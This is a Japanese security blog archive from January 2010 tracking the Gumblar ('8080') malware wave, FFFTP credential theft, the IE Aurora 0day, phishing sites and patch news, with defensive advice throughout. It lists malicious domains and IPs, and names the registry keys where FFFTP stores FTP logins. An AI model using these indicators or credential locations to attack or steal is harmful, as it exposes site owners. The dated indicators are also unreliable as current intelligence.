Archive for 1 月, 2010

« Previous Entries

[Apologize] お詫び

Posted in Announce, apologize on 1 月 31st, 2010 by gnome

まず、FFFTPの作者のSota様にお詫び申し上げます。

FFFTP が 8080系の攻撃誘引を行っているような印象を与えてしまったことに関して、意図したものではありませんが誤解を招く表現があったことを重ねてお詫び申し上げます。

最大の防御策は言うまでも無く、ウィルス・マルウェアに感染しないことです。それが早い段階で徹底できていれば、ここまで事態が悪化することは無かったでしょう。

非SSL/TLSのFTP Credential送信は telnetと同様に極めて危険であることを認識し、非SSL/TLSのものを当サイトとしては推奨することはできなかったということを理解いただければ幸いです。

当サイトは特定の事業者、個人を攻撃するものではなく、セキュリティという、普段は厄介者扱いされるものを他と違った視点で見つめるものでした。その意図が捻じ曲げられて吹聴されることは非常に残念です。

------------
EoF

9 Comments »

2010.01.31 日曜日

Posted in security on 1 月 31st, 2010 by gnome

[投稿日時 : 2010.01.31 AM 9:40]
生命保険の日

1882年、日本初の生命保険金支払いが行われたことに因み、MDRT日本会が制定。
これとは別に、生命保険協会は生命保険の日を11/1と定めている。
愛妻の日
[あい(I)さい(31)]
晦日正月,晦日節
正月最後の日

----------

これが最後の記事になったら笑ってやってください。

----------
CVE-2010-0249 in Operation Aurora
CVE-2010-0249 Exploit コード生成ツール
CVE-2010-0249 Exploit コード生成ツール (by 暗黒工作組) を使ったExploitの作成とその実証。
非常に詳細な検証に、いつも頭が下がります。
生成された Exploit コード ie.html を同環境の Internet Explorer 6(IE6)で開くと、cmd.exe が起動しました。この日記での Exploit コードの実行については、おまけ程度です。成功しちゃいましたよ~ぐらいですね。
成功しちゃうのですね~

一応、MSサイドは、MS10-002を適応していれば大丈夫! ということになっては居るのですが、色々な意見があって評価待ちになっています。
Researcher to reveal more Internet Explorer problems
'Aurora' Exploit Retooled To Bypass Internet Explorer's DEP Security
特にVUPENのDEP Bypassは、成功するならクリティカルヒットなのですが、PoCも不明ですのでなんとも・・・

参考(際限なく増え続ける汚染散布元の情報):
IE 0day CVE-2010-0249 – Blocking and Tracking

必須
 1/21適用の Microsoft パッチを適応してください。
運用回避策
 Windows XP SP2 以前のものは SP3にあげてください
 Internet Explorer 6は Internet Explorer 8に上げてください。
 DEPを有効にしてください。

----------
Pushdo(cutwail) scatter DDoS it owns
Pushdo DDoS'ing or Blending In?
What's going on here? Well it seems the Pushdo botnet recently made changes to its code to cause infected nodes to create junk SSL connections to approximately 315 different websites.
かなり広範な、BFA(with SSL というかほとんどDDoS)が検知されているようです。
www.sans.org:
Got PushDo SSL packets?
ZeusTracker:
secure.skype.com:
Skypeのフィッシングサイトの報告が今月頭にありましたが、特に大きく広まっては居ないようです。

影響を受けるシステム:
 攻撃対象になっているサーバ(IP/ドメイン)
対策:
 DDoS対処
 自システム・環境の汚染調査
 自管轄ISP内に攻撃ノードが存在しないかどうか

※PushdoはBredlab(Bredolab)に陥落した結果のzombie-nodeである可能性があります。

----------
FileZillaの見解
FFFTP同様、8080系マルウェアによってID/PASS/接続先を抜かれているとされる FileZillaですが以下のような見解です。
私の意見は差し挟まないことにしておきます。
Filezilla security virus exploit
1) Is the Filezilla team aware
Naturally.
This isn't a vulnerability in FileZilla. If you get infected by Gumblar it's through other means, not because you are using FileZilla. To my knowledge the attack vector of Gumblar is through malicious PDF and Flash documents. If you are worried about getting infected, stop using proprietary programs that have a track record of tons of vulnerabilities. This includes all software made by Adobe.

2) Is there going to be an encryption upgrade to the package for the stored FTP details.
Gumblar actually fetches the user's FTP credentials by sniffing the outgoing network traffic. Even if no passwords are ever stored on an infected computer, as soon as you use it to connect to some FTP server, your credentials are compromised.

Here's a simple rule: If your computer got infected, you've lost already, it's game over. You need to prevent the infection in the first place.

yikes!

----------
「ガンブラー」対策
これももう、自分の意見は何もいわないことにしておきますか
ガンブラー型ウイルス猛威、サイト改ざん悪質化
さらに、同じ攻撃手法の“新型”も登場。ウイルス対策会社によると、この1か月間で400近い企業サイトの改ざんが確認された。新タイプでは、従来型と違い、クレジットカード番号を盗む仕組みが加わるなど、犯罪の意図が明確になってきているという。
!?

ガンブラーは昨春、世界的に出回り始め、いったん沈静化したものの昨年10月頃に再燃。改ざんされたサイトを閲覧すると、不正サイトに誘導され、IDやパスワードなどを抜き取られるというものだったが、実害が報告されないまま同12月中旬に攻撃は静まった。

 ところが、この頃から今年にかけて“第3波”が来襲。今度は、不正サイトに誘導された後、偽のウイルス対策ソフトをインストールさせて、クレジットカード番号などを盗んだり、スパムメール(迷惑メール)配信に利用されたりする恐れがあるという。
*sigh*

住民などの個人情報が盗まれる恐れがあるとして、総務省では、所管の財団法人「地方自治情報センター」が作成したガンブラー専用の検知システムを利用するよう全国の自治体に呼びかけている。
Web感染型マルウェア能動的検知事業

※詳細は、『「Web 感染型マルウェア能動的検知事業」開始に当たって』をダウンロードし、ご参照ください。(LGWAN接続環境が必要です。)
総合行政ネットワーク
*shrug*

ガンブラー対策とは
クライアントサイド:
Microsoft Updateを常に自動で行ってください。
Adobe Flashを使用している場合、最新版にしてください。
Adobe (Acrobat) Readerを使用している場合、最新版にしてください。
Oracle(SUN) JAVA JRE を使用している場合、最新版にしてください。
Apple QuickTime を使用している場合、最新版にしてください。
Adobe Acrobat/Reader のJavaScript機能は、必要ある人以外はOFFにしてください。
古いOracle(SUN) JAVA JREを確実に削除してください。
平文によるFTP送受信を行わないでください。
FTPクライアントのパスワードを保存しないでください。
その他、インターネット上に送受信するアプリケーションを最新にするか、不要なものは削除してください。
適切な対ウィルスソフトを導入し、定期的にスキャンを実行してください。
適切なファイアウォールを導入してください。
インターネットへの接続は必ず物理的障壁を(ルータでも可)を経由し、直結しないでください。
HIPSの動作を理解した上で、導入を検討してください。
ブラウザのJavaScriptをサイト毎に制約する環境を構築してください。
サイトを跨るスクリプトの実行を防止してください

サーバーサイド:
脆弱性情報に常に注意を払ってください
FTPはSSLのみを許可してください。
vsftpd : ssl_enable=YES / force_local_logins_ssl=YES / force_local_data_ssl=YES
FTP接続可能なIPを指定してください。
ログを定期的にチェックし、SQLインジェクションを狙ったと見られるクエリの抽出を行ってください
参考:
ガンブラー再燃を契機にセキュリティの基本を見直そう
SQLインジェクション検出ツール「iLogScanner」を機能強化

----------
Day-2 : RFI
SANSの新シリーズ「Weblogを解析する」
第2回は RFI です。
Weathering the Storm Part 2: A Day of Weblogs at the Internet Storm Center
RFIはPHPの脆弱性を元にサーバにテキストファイルの形でスクリプトを注入する攻撃で、数年前に大流行しましたが、現在は下火になっているように見受けられます。
参考:
サーバーも狙われる ~RFI攻撃によるボットの感染~ 2008/04/07
下火になったといっても、完全に攻撃が収束しているわけでもなく、.gif .txt .doc .dat のような拡張子で差し込まれている例がちらほら散見されます。
まずは、phpinfo();を取ってみて、以下を確認してみましょうか?
There are a number of simple configuration choices which will prevent exploitation of most of these problems, even if the old software is still install. For example:

  • turn off register_globals
  • turn off allow_url_include


ちなみに第一回は GET,POST,OPTION以外のクエリメソッドのお話
Weathering the Storm: A Day of Weblogs at the Internet Storm Center
\x81って何だ!?
AN HTTPD ゲストブック/コメント集(2002年6月27日17:51)

考察その他:
Hardened-PHP Project
register_globals boolean
警告
この機能は PHP 5.3.0 で 非推奨となり、PHP 6.0.0 で削除されます。この機能を使用しないことを強く推奨します
PHP と Web アプリケーションのセキュリティについてのメモ : wv7y-kmr氏

----------

・・・・・・
ぐったり

ここまで書いて音を上げました。
とてもこんな感じでは毎日続けられそうにありません。

やはり私のような根がいいかげんな人間がセキュリティを語るのがおこがましかったようですネ。

----------
その他:リンクのみ

部内にキーロガーを仕組んだ男性社員――不正を生ませない人的対策

ガンブラー対策とクラウド型セキュリティ―G Data Software
ドイツのセキュリティベンダーである G Data は、当時、GENO ウイルスという名称で注意喚起を行い、かつワクチンが対応していたベンダーの一つだった。

BoA Offline?
it works

Simmering Over a ‘Cyber Cold War’

Weaning the Web off of Session Cookies

Google DocsとGoogle Sitesが3月からIE6のサポートを停止

The Flash is always greener: Why the iPhone won’t have Flash anytime soon

iPadと石ころを比較する

Welcome(?) back
ガンブラー 感染動画2
なぜか最近感染したくてもできない状態が続いていたいわゆるガンブラー(8080系)が、元気になってあなたの元へかえってきましたよ!

FFFTPの「設定をINIファイルに保存」を有効にしている場合どうなるの?なんて質問もあったので、今回はレジストリに登録されている情報を削除して、その設定を有効にしておきました!

これで様子を見て改ざんされないようなら、今の所INIファイルの情報までは読みに行ってないっていう事かもしれないけど結局ハッキリした事は言い切れないので微妙なところだよね!

----------
8080
*NEW*
81.28.96.129 AS41770(IMINGO)

77.68.44.169 AS15418(FASTHOSTS)
78.31.107.49 AS24931(DEDIPOWER)
82.165.47.29 AS8560(ONEANDONE-AS)
87.118.90.76 AS31103(KEYWEB-AS)
217.160.110.21 AS8560(ONEANDONE-AS)

やはりラウンドロビンに2系統ある模様です。

----------
Google Safe Browsing
| 1264881614 | B | [goog-black-hash 1.49962 update]
| 1264881601 | M | [goog-malware-hash 1.19012 update]
| 296154 | -628(296782) 微減
| 1295312 |

--------------------------
お詫びに書いていたものを移動しました。

一応、お詫びのお詫びということで、FFFTPの作者のSota様から、何かポストやメールがあったわけではないことを(必要ないとは思っていたのですが)明確にお知らせしておきます。
作者のsota様には重ねてお詫び申し上げます。

直接の対象である某Li●○にはいろいろ言いたいことはありますが、あえて何もいわないことにします。

以下、お詫びから移動した部分
--------------------------

と書いて閉鎖しようかなとか思ってますけどダメですか?

--------------------------

Nifty-serveの一件のときもそうですが、記事の一部を抽出して前後関係を見ずに広めるのはやめていただけませんか?

今後もそうなるというのなら、私はその日その日、1件の記事に必ず前後関係の問題を書かなければならないのでしょうか?

ウィルスに感染しないとか、コンポネンツ系のアップデートを必ず行うとか、大前提を毎日数行書かなければなりませんか?

当該記事の修正を迫るなら、自分はこう書くべきだという模範解答を自分のblogに書いて、それを公開してください。謹んでこちらからリンクを貼らせて頂きます。

--------------------------

EoF

2 Comments »

[WARNING] NCSoft フィッシングに注意

Posted in Announce, RiskHedge, security on 1 月 30th, 2010 by gnome

NCSoft Phishing

From: makelelejr@hotmail.com
To: makelelejr@hotmail.com
Subject: Password Reset Success
Date: Thu=2C 28 Jan 2010 10:46:17 +0800

Someone 65.255.34・173 Aion has been reset to your game account password. If you not make the change=2C please contact support https://secure.ncsoft.com/login.20

Phishing Site:
hXXp://www.secure-ncsoft-nic.com
216.245.220.121 via LimeStone

Redirection:
hXXp://safe.saouar-ncsoft.com/
67.231.248.13 via ?(謎AS)
route-record : MISSING!
おいおい・・

LimeStoneなので、通報すれば即テイクダウンするでしょうが、ドメインや収容先は当然、変動の恐れがあります。

NCSoft(韓国のネットワークゲーム・ベンダー)のユーザは気をつけましょう。
公式のログイン先は
https://secure.ncsoft.com/loginです。

炎上中の模様:
ttp://www.aionsource.com/forum/aion-discussion/104445-consolidated-phishing-attempt-thread-your-password-has-been-reset-check.html
安全性に自信が持てないので自己責任でお願いします。

Leave A Comment »

2010.01.30 土曜日

Posted in security on 1 月 30th, 2010 by gnome

孝明天皇
宮中祭祀の一つ。孝明天皇が死去した日で、皇居内の皇霊殿と孝明天皇の陵所である京都の月輪東山陵で祭典が行われる。
3分間電話の日
1970(昭和45)年、公衆電話の通話料金が3分で10円になった。
Windows Vista発売の日。(2007)
マハトマ・ガンディー暗殺の日(1948)

----------
iTunesの重複ID問題?
iTunes、IDなりすましの恐れ アップル社調査
千葉県の女性は約2週間前、実在する北海道の女性の利用画面に偶然に入ってしまった。千葉県の女性によると、新しく設定したIDでiTSに接続し、パスワードを入れたところ、何度か「違う」と接続を拒まれた。パスワードを再登録し、再接続してみると、個人情報の画面に北海道の女性の住所や電話番号、クレジットカード番号の一部、誕生日などが表示された。商品を買えば、代金の請求は北海道の女性のクレジットカードで決済される状態だったとみられる。
あちゃ~
アップル社からは、かつて北海道の女性が同じIDを設定していて、その女性の個人情報がiTSのコンピューターに残っていたために起きた可能性がある、と説明されたという。同社によると、一度登録されたIDやパスワードは、本人が申請しない限り消去しないという。
ちょっ・・
iTunes使ったこと無いのでわからないですが、重複可能IDで、ID削除=削除フラグ立てただけで再登録許可?とか? マサカネ?(笑)

この問題にきちんとした説明がなされるまで、iTuneStoreに個人情報を入れるのはやめたほうが良いと思いますが、しばらくは説明されることは無いでしょう(だってAppleだし~)

----------
500$ per BUG
Encouraging More Chromium Security Research
A) As per Mozilla, our base reward for eligible bugs is $500.
というわけで、Chromeのセキュリティバグを見つけて通報すると 「500$ 獲ったど~」というキャンペーン(というかシステム)を開始するようです。
Googleなんだから $2000 くらい出せば?とか思ったりしちゃダメ
※最大 $1337 「獲ったど~」ですね

Heiseのキャッチが一番面白かったかな
Google invites attacks on Chrome

----------
セキュソフトの価値
アンチウイルスソフトウェアの仕組み--入れる価値はあるのか
How antivirus software works: Is it worth it?
この記事が完全に正鵠を得ているかどうかは、各個人の判断にお任せします。

しかし、最近の統合型セキュリティソフトは訳のわからない挙動をし、本来必要なプロセスを阻害し、正常なファイルを誤検知し、そして肝心の攻撃には無防備というケースが多すぎます。

セキュリティソフトはあくまでも保険であって、セキュソフトを入れるだけで安全という時代は既に過去のものです。
そのことをきちんと理解し、「最終的に自分を守れるのは自分だけ」ということを肝に銘じたいものです。

----------
APT
今日のキー(?)ワード
Advanced Persistent Threat (APT)
また変な用語が出てきた・・・
The Big Oil APT and Botnet Business
なんか、スパイ大作戦(ふるっ)のような内容でアレですが、確かにGhostNetなんか信じてなかったのに、今回のAuroraは結構信じられてますよね~

戦争の手段が電子化するにつれ、本気でそういうことを考えなければならなくなるのかもしれません。
が・・そんなことを一般人が考えてもしょうがないわけでして、ウチの国は大丈夫なんでしょうかネ?

Critical Infrastructure Protection Now

微妙に続く
----------
PPDF
P(oizon)PDFの散布が止まりません
via contagio
Jan 28 CVE-2009-4324 台美軍售最新情況.pdf The latest U.S. arms sales to Taiwan
Jan 28 CVE-2009-4324 PEER REVIEW--Assessing Chinese Military Transparency from phillip.saunders74@yahoo.com
Jan 27 CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 letter to Solarz and US position on free speech rights
軍事系のメールを装っていることが多いのですが、関連の省庁の方、ちゃんと対策してるんですかね?

続く
----------
Adobe Phisherman's Work
アドビを装う新たなフィッシング詐欺メールにご注意
Adobeを装い、「Adobe Acrobat」「Adobe Reader」の新バージョンを通知すると見せかけた電子メールを送りつけ、個人情報などを盗もうとするフィッシング詐欺が新たに確認された。この電子メールは1月28日から送信されているが、Adobeでは、受信した場合は何もせずに削除するよう呼びかけている

さらに微妙に続く
----------
Hot(Cold) Fusion
Solution available for potential ColdFusion information disclosure issue
solution:
ColdFusion 9: How to limit access to the Solr collections
ColdFusion by default allows collections created by the Solr Service to be accessed from any external machine using a URL. This allows users to access information about the collections as well as search and index them.
意図しない不特定ユーザも、Solr検索サービスとクエリの閲覧が可能っと・・

Solr検索サービス

----------
CVE-2010-0006
Linux カーネルの IPv6 jumbogram 処理に脆弱性
細工された IPv6 jumbogram により、サービス運用妨害 (DoS) 攻撃を受ける可能性があります。
その前に、IPv6を導入してるところがどのくらいあ・・・

CVE-2010-0006 - kernel: ipv6: skb_dst() can be NULL in ipv6_hop_jumbo()

Fedora: "# yum update kernel"
Fedora update for kernel 2
Fedora update for kernel 2

----------
gzip
細工された gzip 圧縮ファイルを処理させることで、サービス運用妨害 (DoS) 攻撃を受けたり、ユーザの権限で任意のコードを実行されたりする可能性があります。
細工された IPv6 jumbogram により、サービス運用妨害 (DoS) 攻撃を受ける可能性があります。

CVE-2009-2624:
GNU gzip "huft_build()" Input Sanitation Vulnerability 3

CVE-2010-0001:
GNU gzip "unlzw()" Integer Underflow Vulnerability 3
Update to version 1.4. thru # yum update gzip

----------
その他穴ぼこっ

Hitachi Products Image File Processing Buffer Overflow 4
Update to a fixed version. See vendor advisory for details.

Geo++ GNCASTER Multiple Weaknesses and Vulnerabilities 4
Update to version 1.4.0.8.

ircd-ratbox Integer Underflow and NULL Pointer Dereference Vulnerabilities 4
Update to version 2.2.9(ircd-ratbox-2.2.9.tar.bz2).

oftc-hybrid "LINKS" Command Integer Underflow Vulnerability 4
Update to version 1.6.8(oftc-hybrid-1.6.8.tar.gz).

IRCD-hybrid "LINKS" Command Integer Underflow Vulnerability 4
Fixed in the SVN repository.

影響下にあるひとは・・・あまり多く無さそうですが

----------
Gumblar≠8080
もういいかげん後ろに™とかつけるのやめて欲しいと怒られましたので、従来どおり gumblar, Gumblar.x, 8080系の表記に戻そうと思います。

さて、その8080系ですが、誘導スクリプトの変更を(デバッグも含めて)実際の感染環境で行っており、コードがコロコロ猫の目のように変わっています。「実環境でテストするな!」って言っても聞いてくれなそうだしなぁ・・

Gumblar.xのときと違い、FTPでインジェクションを行ってくるIPとか、マルチドロッパによってインストールされるスニファの情報送信先とかの情報がぜんぜん出てこないので、感染時のインジェクションドロッパのドメイン・IPを地道にふさいでいくしかなさそうですが、これまた非常識なペースで変わっているので正直オテアゲです。

サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
サイト改ざん止まず(2) 改ざんサイト告知一覧(2010年1月14日~1月28日)
さすが、so-netさん。素早いですね。

いつも出てくるこの6行
(1) Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2) Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定する
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

のほかに、うちとしては以下を加えたいですね。
(7) JREの古いバージョンが残っていないか確認し、確実に消す。
(8) FFFTPの使用を中止し、かならずレジストリから関連項目を消す。
(9) (S)FTP(S)クライアントに絶対にパスワードを保存しない。

参考:
10 FTP Clients Malware Steals Credentials From
Beware: FileZilla Doesn’t Protect Your Passwords
ガンブラー(/*Exception*/) vs Norton Internet Security 2010
[Hammmer and Anvil] 夜間便
8080(Gumblar)はFFFTPも狙うのだそうです。
CVE-2008-5353 の Exploit コードで脆弱な JRE が悪用されるのか確認する
JRE 1.6.0_u10 でのインストールパスの変更
自己責任:
JavaRa

厚生労働省のWebで「電子申請・届出システムによる手続」をするのに、申請用アプリ...
オワタ\(^o^)/

----------
その他

Privacy issue in Google Toolbar fixed
IEでGoogle ToolBarを使っている方へ
古いGoogle Toolbarをアンインストールし、最新版を入れなおしましょう。

永遠のビギナー
対策っていわれても・・・

新手法のInjection
SOHU Digital Channel Web Site Compromised with Xunlei Thunder DapPlayer Exploit
Ciscoに取られちゃったScanSafeが、新手法系のレポートをやめてしまったので、WebSenseの情報への依存率上昇中・・他のソースも探さないと・・

ESET Smart Security / ESET NOD32アンチウイルスにおける誤検出について
ぷよ!

----------
ガンブラー なんじゃこりゃ
ガンブラー なんじゃこりゃ

isusualって何だろう・・・ unusualなのかな?
というか、コレ何語?(笑)

いつもお疲れ様です m(_ _)m

無理しちゃだめですよ~

----------
8080
MalwareURL(以下MalURL)では、8080系のことを、"Fragus Exploit Pack"と定義したようです。
エクスプロイト・ツールキット「Fragus」,ビジネス・モデルを変更
yourtruemate.ru
genuinecolors.ru
superhighest.ru
gametopsite.ru

77.68.44.169 AS15418(FASTHOSTS)
IP: MDL(無) 77.68.44.169
AS:15418 AS15418

78.31.107.49 AS24931(DEDIPOWER)
IP: MDL(無) MalURL(無)
AS:24931 AS24931

82.165.47.29 AS8560(ONEANDONE-AS)
IP: MDL(無) 82.165.47.29
AS:8560 AS8560

87.118.90.76 AS31103(KEYWEB-AS)
IP: MDL(無) 87.118.90.76
AS:31103 AS31103

94.102.146.242 AS8426(CLARANET-AS)
IP: MDL(無) MalURL(無)
AS:8426 AS8426

A群のラウンドロビンがB群に統合されました。(恐らくキャッシュの行き渡るタイミングの問題?)IPの変動はありませんでした。

MDL/MalURLを調査してみましたが、どこも「防弾ホスト」としてしまうにはちょっと条件が薄い・・・
とりあえず単体IPだけ焼いて様子見しましょうか?

----------
Google Safe Browsing
| 1264795218 | B | [goog-black-hash 1.49890 update]
| 1264795205 | M | [goog-malware-hash 1.18988 update]
| 296782 | -2438(299220) 減少に反転
| 1293213 |
EoF

Leave A Comment »

2010.01.29 金曜日

Posted in security on 1 月 29th, 2010 by gnome

人口調査記念日
1872年のこの日に日本初の全国戸籍調査が実施されたことに因む。
参考:壬申戸籍
世界救らいの日
タウン情報の日
1973年のこの日に日本初の地域情報誌『ながの情報』が発行されたことに因み、タウン情報全国ネットワークが制定。

昨日:
Data Privacy Day
日本語ページ無いからすっかり忘れてましたよ!

----------

時間が無いので駆け足~

----------
Privacy Day
Data Privacy Day is January 28, 2010!
日本で取り上げてるのはITMediaさんだけ・・?
1月28日は「Data Privacy Day」――米国、カナダ、欧州27カ国が参加
米国、カナダ、欧州27カ国の公的機関や企業が1月28日を「Data Privacy Day」と定め、各地でさまざまなイベントを主催した。Data Privacy Dayはオンラインでの個人データ保護の推進とプライバシー意識の向上を目標としており、今年で2年目となる。
米国からは司法省や国土安全保障省などの政府機関、大学、Microsoft、Google、Intel、Yahoo!などの大手IT企業が参加を表明している。
州政府や各社はそれぞれ、公式ブログや専用サイトで、独自のプライバシー保護に関する取り組みについて説明。例えばGoogleは、今年に入って刷新したPrivacy Centerで、自社のプライバシー保護方針やユーザーデータの活用法などを数カ国語に翻訳して公開していることを、改めて公式ブログに記している。

Googleがプライバシーに関する企業誓約を更新
新しいといっても、前ととくに変わったところはないが、Googleはユーザの情報を大量に入手できる立場にいるから、われわれを改めて安心させる意味もある。
Transparency and Choice -- Google Privacy Center

あらためて、プライバシーとは何か、個人情報とは何か? 何が秘匿されるべきで、何が大丈夫なのか?といったことを考えなければならないでしょう。

----------
週間脆弱性
チェックしておきたいぜい弱性情報<2010.01.28> BGM
Adobe Reader、Acrobat 9.3/8.2リリース(2010/01/12)
オラクル2010年1月の四半期セキュリティ・アップデート(2010/01/12)
マイクロソフト2010年1月の月例セキュリティ・アップデート(2010/01/13)
JDK/JRE 6 Update 18リリース(2010/01/15)
セキュアUSBにパスワード関連のぜい弱性(2010/01/07)

今回は大物のオサライでした。

----------
どこまでも続く
Internet Explorer still a problem child
週末から開催される BlackHat dc+2010(Arlington.VA)で、IEのローカルファイル奪取の脆弱性のデモが公開される模様。

そしてまたパッチがあたるまで「信頼できないゾーンのJavaScriptを切った」り、貼ったりしなければいけないのでしょうか?

----------
フィッシング調査報告
Report: 48% of 22 million scanned computers infected with malware
via: APWG Phishing Activity Trends Report for Q3 of 2009
Q3: Scanned Computers : 22,754,837
Infected Computers : 11,001,646 48.35%
スキャン対象は、PandaLabs. のオンラインスキャナーかな?
Panda Labs gathers data from millions of computers worldwide through its scanning service to give a statistically valid view of the security situation at the desktop.

怪しいと思ってスキャンするのでヒット率は高いでしょうが、それにしても・・・・

----------
TechCrunch
TechCrunchサイトがまた改ざん、今度は創設者中傷のメッセージ
セキュリティ企業の英Sophosは1月27日のブログで、IT情報サイトのTechCrunchが再びハッキングされ、サイト創設者を中傷するメッセージが掲載されたと伝えた。TechCrunchは米国時間の25日にも改ざん被害に遭って一時ダウンしたばかり。
ハッキングは1度目は不運で済むが、2度目になると不注意とみなされるとクルーリー氏は指摘。

さて・・WordPress脆弱性でなきゃいいんですが・・・

----------
分析
情報セキュリティ産業の構造に関する基礎調査
何でもかんでもPDFだけで発行するのはそろそろ・・・
情報セキュリティ市場、日本は世界の13%――IPA調査
日本の情報セキュリティ関連政策では、政府機関の情報セキュリティ対策は内閣官房情報セキュリティセンター(NISC)が政府機関統一基準を策定し、府省が自主的に取組みを実施している。政府機関統一基準などによる基準や技術の開発は行わず、民間での参照も限定的であり、民間への波及効果や技術支援といった要素は伴なっていないという。情報セキュリティ人材を狙った育成策もなく、技術開発支援成果を民間で事業化する取り組みが限定的であることなどが分かった。
IPAは今後も調査を継続し、国内の情報セキュリティ産業の活性化や対策をより高度化・充実させるための施策に反映させたいとコメントしている。

その貴重な予算が何につかわれていたかは敢えて言及するまでもく・・・

----------
Cisco
Cisco Releases Security Advisory for Unified MeetingPlace
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified MeetingPlace
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified MeetingPlace
Cisco Unified MeetingPlace Multiple Vulnerabilities 3

Solution: vender patch

----------
その他

クラウド志向やウイルス事件で浮き彫りになった企業セキュリティの課題
Gumblar型ですか・・?
ホスティング全陥落にはもっと悲惨な事例もありますが
サーバーアプリの脆弱性突かれ、共有サーバー丸ごと改ざん

Haiti Spam Leads to New Malware
現金を扱うコンテンツがターゲットになるのは当然ですが、こうした時事ネタには引っかかりやすいのでしょうね

「iPad」に便乗した偽ソフト出現、検索サイト経由で誘導
ほらね・・(苦笑)

Symantec generating a False Positive on Flash Player installer
Flash Player - False Positive
そして、誤検知も連鎖反応が(ぷよぷよ!?)

Wireshark 1.2.6 Release Notes
security : Multiple vulnerabilities in Wireshark® version 0.9.0 to 1.2.4
Wireshark LWRES Dissector Buffer Overflow Vulnerabilities 3

Troj/JSRedir-AK morphs into Troj/JSRedir-AR
comment: pob
I have just updated the Sophos detection for Troj/JSRedir-AK for this variant.
These guys are morphing the code more regularly than they used to.
Sophosの /* */ なし検出シグネチャは Troj/JSRedir-AK だそうです。

APNICに新規に割り当てられた 1.0.0.0/8 と 27.0.0.0/8
とりあえず、1.1.1.0/Cと 1.2.3.0/Cは、de-bogon扱いになったようで、一安心・・なのかな?
参考:Bogons Ate My Web Site -- 2005


----
すみません、この先完全に時間切れ:リンクのみ

Botnet C&C switching to http; away from IRC

オラクル、サンの買収完了を発表

Minipost: VISA Zeus
via
visa.comの偽サイト -- January 28, 2010
58.158.42.57 == 58x158x42x57.ap58.ftth.ucom.ne.jp:新規
115.177.129.136 == nttkyo943136.tkyo.nt.ftth.ppp.infoweb.ne.jp:いつもの

Apache mod_proxy "ap_proxy_send_fb()" Integer Truncation Vulnerability 4

yaSSL Certificate Processing Buffer Overflow Vulnerability 4
MySQL yaSSL Certificate Processing Buffer Overflow Vulnerability 3
----------
Gumblar.8080

yourtruemate.ru
77.68.44.169 AS15418(FASTHOSTS) 新ISP 新IP Gloucester, UK.
78.31.107.49 AS24931(DEDIPOWER) 新ISP 新IP London, UK
82.165.47.29 AS8560(ONEANDONE-AS) 新ISP 新IP Germany
87.118.90.76 AS31103(KEYWEB-AS) 新ISP 新IP Germany
217.160.110.21 AS8560(ONEANDONE-AS) 新ISP 新IP Germany

genuinecolors.ru
80.69.74.73 AS20857(TRANSIP)
91.121.4.99 AS16276(OVH Paris)
91.121.86.130 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

分岐Aグループが、完全に新サーバ群を使用するようになりました。
至急定義更新を考慮してください。

----------
Google Safe Browsing
| 1264708831 | B | [goog-black-hash 1.49818 update]
| 1264708802 | M | [goog-malware-hash 1.18964 update]
| 299220 | +2171(297049) また増加傾向に
| 1289451 |
EoF

Leave A Comment »

[Hammmer and Anvil] 夜間便

Posted in Misc on 1 月 28th, 2010 by gnome

Thanks and Farewell FFFTP
banana様の貴重な実検証結果により、FFFTPが完全にターゲットになっていることを受け、FFFTPへの手向けの花を・・・


Dedicated to FFFTP

FFFTPは非常に優れたフリーのFTPクライアントでした。本当に感謝いたします。
しかし、 Version 1.96d [2008/9/23]を最後に更新停止されており、レジストリに ID/Password/接続先 を書き込むため、現在 8080系のマルウェアによって、感染と同時に窃取される危険性があります。
これまでの使用実績に感謝しつつ、ソフトをアンインストールし、以下のレジストリを必ず消去してください

HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host(n) : nは数字
例:
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host0
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host1
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host2
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host3
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options\Host4
以下、登録しておいたホストの数だけ・・

代替のFTPクライアントは、何がいいのか、私にもよくわかりません。
私は WinSCPのFTPSモードを使用しています。
WinSCP の設定方法
保存したパスワードは簡単に復元できるように格納されています。自動的(非対話)な使用を許可する場合では安全にパスワードを暗号化するのは不可能です。もし、パスワードを保存しようとしているシステムの物理的電気的なセキュリティが完全でない場合パスワードを保存しないこと。

FileZillaを使用する際には、絶対にパスワードを保存しないでください。

※FFFTPは、パスワードをきちんと暗号化して、レジストリに書き込んでいます。しかし、OSS(オープンソース)の宿命で、ソースコードを解析されてしまうと、それは意味がなくなります。8080系の攻撃者は日本への攻撃のウェイトかなり重視している証明でもあります。

----------
追記 2010.01.30
流れを見ないでこの記事だけ見たら何のことかわからないかもしれないので補足しておきます。

何が問題なの?
日本語で開発され、日本で圧倒的シェアをもっていると思われるアプリケーションをターゲットに狙われたという点です。

どのみちFTPは平文転送なんだから同じでしょ?
過去に1回でもFFFTPをインストールして使用した環境は、現在は使用していなくてもその残骸がレジストリに残っています。そして運悪くマルウェアに感染したら意図していないにもかかわらずその情報が窃取されます。
※例えば、自分が出先でFTPを使うためにちょっとインストールして、使用後、そのフォルダだけ消したとします。しかしそのレジストリが残っており、もしパスワードを保存してしまったとしたら、誰かがレジストリを消さない限り延々と残り続けるのです。そしてFFFTPを起動できない環境であっても、マルウェア感染の有無にかかわらず、ID/PASS/接続先が窃取される恐れがあります。

対策は無いのでは?
既存の全てのFTPのID/PASSWORDを変更し、現時点でアクセスすることのないIDを消去するしかありません。

他のFTPソフトを使えば安全なの?
パスワードを保存しなければ安全・・・といいきれない点が問題です。
